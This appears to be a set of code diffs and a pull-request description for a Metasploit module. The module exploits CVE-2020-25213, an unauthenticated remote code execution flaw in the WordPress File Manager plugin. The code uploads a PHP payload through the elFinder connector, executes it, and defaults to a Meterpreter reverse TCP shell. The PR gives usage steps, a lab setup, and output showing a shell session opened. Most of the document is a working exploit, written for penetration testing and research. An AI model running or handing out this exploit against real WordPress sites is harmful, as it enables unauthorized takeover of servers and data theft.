+      post_data['A1A2A3A4'] = 'Lw'
+      post_data['B1B2B3B4'] = "\"name\"\r\n"
+      post_data['C1C2C3C4'] = filename
+    when 'put'
+      post_data['A1A2A3A4'] = Rex::Text.encode_base64(filename)
+      post_data['B1B2B3B4'] = "\"content\"\r\n"
+      post_data['C1C2C3C4'] = payload
+    end
+
+    # the boundary in the Content-Type has 2 less hyphens than the others (!)
+    # it actually has to be that way to work (!)
+    res = send_request_cgi(
+      'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{boundary[2..-1]}",
+      'data' => post_data
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
   end
 end

--- a/modules/exploits/multi/http/wp_file_manager_rce.rb
+++ b/modules/exploits/multi/http/wp_file_manager_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -36,7 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => ARCH_PHP,
         'Targets' =>
           [
-            [ 'WordPress File Manager 6.0-6.8', {} ]
+            [
+              'WordPress File Manager 6.0-6.8',
+              {
+                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
+              }
+            ]
           ],
         'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
         'DefaultTarget' => 0
@@ -51,43 +57,34 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    begin
-      return CheckCode::Unknown unless wordpress_and_online?
+    return CheckCode::Unknown unless wordpress_and_online?
 
-      # check the plugin version from readme
-      check_plugin_version_from_readme('wp-file-manager', nil, 6.0)
-    end
+    # check the plugin version from readme
+    check_plugin_version_from_readme('wp-file-manager', nil, 6.0)
   end
 
   def exploit
-    begin
-      # carry out check before the exploit
-      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!') unless [CheckCode::Appears].include? check
-      # base path to File Manager plugin
-      file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')
-      # filename of the file to be uploaded/created
-      filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
+    # base path to File Manager plugin
+    file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')
+    # filename of the file to be uploaded/created
+    filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
 
-      case datastore['COMMAND']
-      when 'upload'
-        elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)
-      when 'mkfile+put'
-        elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)
-        elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)
-      end
-
-      payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)
-      print_status("#{peer} - Payload is at #{payload_uri}")
-      # execute the payload
-      send_request_cgi('uri' => normalize_uri(payload_uri))
+    case datastore['COMMAND']
+    when 'upload'
+      elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)
+    when 'mkfile+put'
+      elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)
+      elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)
     end
+
+    payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)
+    print_status("#{peer} - Payload is at #{payload_uri}")
+    # execute the payload
+    send_request_cgi('uri' => normalize_uri(payload_uri))
   end
 
   # make it easier to switch between "upload" and "mkfile+put" exploit methods
   def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})
-    if opts['payload'] != ''
-      payload = opts['payload']
-    end
     filename = opts['filename']
 
     # prep for exploit
@@ -97,13 +94,13 @@ class MetasploitModule < Msf::Exploit::Remote
     case elfinder_cmd
     when 'upload'
       post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
-      post_data.add_part(payload.encode, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
+      post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
     when 'mkfile'
       post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
       post_data.add_part(filename, nil, nil, 'form-data; name="name"')
     when 'put'
       post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')
-      post_data.add_part(payload.encode, nil, nil, 'form-data; name="content"')
+      post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"')
     end
 
     res = send_request_cgi(

--- a/modules/exploits/multi/http/wp_file_manager_rce.rb
+++ b/modules/exploits/multi/http/wp_file_manager_rce.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
             [
               'WordPress File Manager 6.0-6.8',
               {
-                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
+                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
               }
             ]
           ],

--- a/modules/exploits/multi/http/wp_file_manager_rce.rb
+++ b/modules/exploits/multi/http/wp_file_manager_rce.rb
@@ -12,33 +12,34 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'           => 'WordPress File Manager 6.0-6.8 Unauthenticated Remote Code Execution',
-        'Description'    => %q(
+        'Name' => 'WordPress File Manager 6.0-6.8 Unauthenticated Remote Code Execution',
+        'Description' => %q{
           The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and
           execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php
           extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write
           PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
           [
             'Alex Souza (w4fz5uck5)', # initial discovery and PoC
             'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
           ],
-        'References'     =>
+        'References' =>
           [
             [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
-            [ 'CVE', '2020-25213' ]
+            [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
+            [ 'CVE', '2020-25213' ],
           ],
-        'Platform'       => ['php'],
-        'Privileged'     => false,
-        'Arch'           => ARCH_PHP,
-        'Targets'        =>
+        'Platform' => ['php'],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' =>
           [
             [ 'WordPress File Manager 6.0-6.8', {} ]
           ],
-        'DisclosureDate' => "Sep 9 2020", # disclosure date on NVD, PoC was published on August 26 2020
-        'DefaultTarget'  => 0
+        'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
+        'DefaultTarget' => 0
       )
     )
     register_options(
@@ -52,21 +53,22 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       # the readme file contains the version information, so GET that first
       res = send_request_cgi(
-        'uri'       => normalize_uri(target_uri.path, 'readme.txt'),
-        'method'    => 'GET'
+        'uri' => normalize_uri(target_uri.path, 'readme.txt'),
+        'method' => 'GET'
       )
 
       # handle errors just in case
       fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
-      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}" ) unless res.code == 200
+      # no readme? no version detection. set ForceExploit to exploit even if check fails
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
 
       # the first line after the changelog is the currently installed version
       changelog_info = res.body.split('== Changelog ==')[1].split("\n")[2]
       if /(\d\.\d)/ =~ changelog_info
-        version = Gem::Version.new($1)
-        print_status("#{peer} - Detected WordPress File Manager version #{version.to_s}")
+        version = Gem::Version.new(Regexp.last_match(1))
+        print_status("#{peer} - Detected WordPress File Manager version #{version}")
         # versions above 6.8 are patched and versions below 6.0 are not vulnerable
-        unless version < Gem::Version.new('6.0') or version > Gem::Version.new('6.8')
+        unless (version < Gem::Version.new('6.0')) || (version > Gem::Version.new('6.8'))
           return Exploit::CheckCode::Vulnerable
         end
       end
@@ -75,18 +77,14 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  #
-  # The exploit method attempts a login, then attempts to throw a command execution
-  # at a web page through a POST variable
-  #
   def exploit
     begin
       unless [CheckCode::Vulnerable].include? check
-        fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
+        fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
       end
 
       # the smallest PNG I found was 51 bytes: https://github.com/mathiasbynens/small/blob/master/png-truncated.png
-      smallest_png_possible = "89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c4890000000a49444154789c6300010000050001"
+      smallest_png_possible = '89504e470d0a1a0a0000000d49484452000000010000000108060000001f15c4890000000a49444154789c6300010000050001'
       # prep for exploit, it will create a randomly named .php file under TARGETURI/lib/files/
       boundary = "------------------------#{Rex::Text.rand_text_hex(16)}"
       post_data = "#{boundary}\r\n"
@@ -105,16 +103,16 @@ class MetasploitModule < Msf::Exploit::Remote
       # the boundary in the Content-Type has 2 less hyphens than the others (!)
       # it actually has to be that way to work (!)
       res = send_request_cgi(
-        'uri'          => normalize_uri(target_uri.path, 'lib/php/connector.minimal.php'),
-        'method'       => 'POST',
-        'ctype'        => "multipart/form-data; boundary=#{boundary[2..-1]}",
-        'headers'      => {
-            'Accept'          => '*/*',
-            'Accept-Encoding' => 'gzip, deflate',
-            'Connection'      => 'close',
-            'Expect'          => '100-continue'
+        'uri' => normalize_uri(target_uri.path, 'lib/php/connector.minimal.php'),
+        'method' => 'POST',
+        'ctype' => "multipart/form-data; boundary=#{boundary[2..-1]}",
+        'headers' => {
+          'Accept' => '*/*',
+          'Accept-Encoding' => 'gzip, deflate',
+          'Connection' => 'close',
+          'Expect' => '100-continue'
         },
-        'data'         => post_data
+        'data' => post_data
       )
 
       fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
@@ -122,11 +120,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # the result body contains the path of the uploaded payload
       result_body = res.get_json_document
-      payload_uri = result_body['added'][0]['url'].split("../")[1]
+      payload_uri = result_body['added'][0]['url'].split('../')[1]
       vprint_status("#{peer} - Payload is at #{normalize_uri(target_uri.path, "lib/#{payload_uri}")}")
       # execute the payload
       send_request_cgi(
-        'uri'    => normalize_uri(target_uri.path, "lib/#{payload_uri}"),
+        'uri' => normalize_uri(target_uri.path, "lib/#{payload_uri}"),
         'method' => 'GET'
       )
     end


### PR DESCRIPTION
Adds a new module for WordPress File Manager unauthenticated RCE (CVE-2020-25213) + documentation.

This vulnerability can be exploited in 2 ways:
1. `upload` to directly upload a payload
2. `mkfile` to create a file, then `put` to write arbitrary code to the newly created file

## Verification

1. Start msfconsole
2. Do: `use exploit/multi/http/wp_file_manager_rce`
3. Do: `set TARGETURI <target_uri>`
4. Do: `set RHOSTS <target_ip>`
5. Optional: Do: `set RPORT <target_port>`
6. Optional: Do: `set PAYLOAD <payload>` to switch payloads
7. Optional: Do: `set COMMAND <command>` to switch elFinder commands used to exploit vulnerability
7. Do: `check` to confirm existence of vulnerability or `exploit` to let the shells rain

## Test Environment

Tested against WordPress 5.5.1 in a Docker container with File Manager plugin version 6.0

## Test Environment Setup (assuming Docker is already installed)

Append `sudo` to the docker commands unless your user is part of the `docker` group

1. `docker run --name local-mysql -e MYSQL_ROOT_PASSWORD=sup3rs3cr3t -d mysql`
2. `docker exec -it local-mysql mysql -u root -p`
3. (in mysql shell) `create database wordpress;`
4. (in mysql shell) `exit;`
5. `docker run --name local-wordpress -p 8080:80 -d wordpress`
6. `docker network create --attachable wordpress-network`
7. `docker network connect wordpress-network local-mysql`
8. `docker network connect wordpress-network local-wordpress`
9. Navigate to http://localhost:8080 and finish the WordPress setup (database host should be `local-mysql`)
10. Get a copy of the File Manager version 6.0 plugin from https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip
11. Extract the ZIP file containing the plugin. It will produce a folder which contains another ZIP file. That ZIP file is the plugin (named "wp-file-manager-6.O.zip").
12. Change the `upload_max_filesize` to prevent any errors while installing the plugin (solution found at https://techguidereview.com/increase-wordpress-upload-size-docker/):
12.1. `docker exec -it local-wordpress bash`
12.2. `sed -i "6i php_value upload_max_filesize 256M" .htaccess && sed -i "7i php_value post_max_size 256M" .htaccess && exit`
13. Install the FileManager 6.0 plugin by going to http://localhost:8080/wp-admin/plugin-install.php, clicking "Upload Plugin" and selecting the "wp-file-manager-6.O.zip" file.
14. Activate the plugin after installation.

## Example Output
Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload `php/meterpreter/reverse_tcp`, using `upload` method
```
msf6 > use exploit/multi/http/wp_file_manager_rce 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] 127.0.0.1:8080 - Detected WordPress File Manager version 6.0
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/gnjqFk.php
[*] Sending stage (39264 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.2:45710) at 2020-10-11 00:49:34 +0800

meterpreter > sysinfo
Computer    : 6e5e66001274
OS          : Linux 6e5e66001274 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter > 
```

## TODO:
- [x] mkfile+put method to exploit vulnerability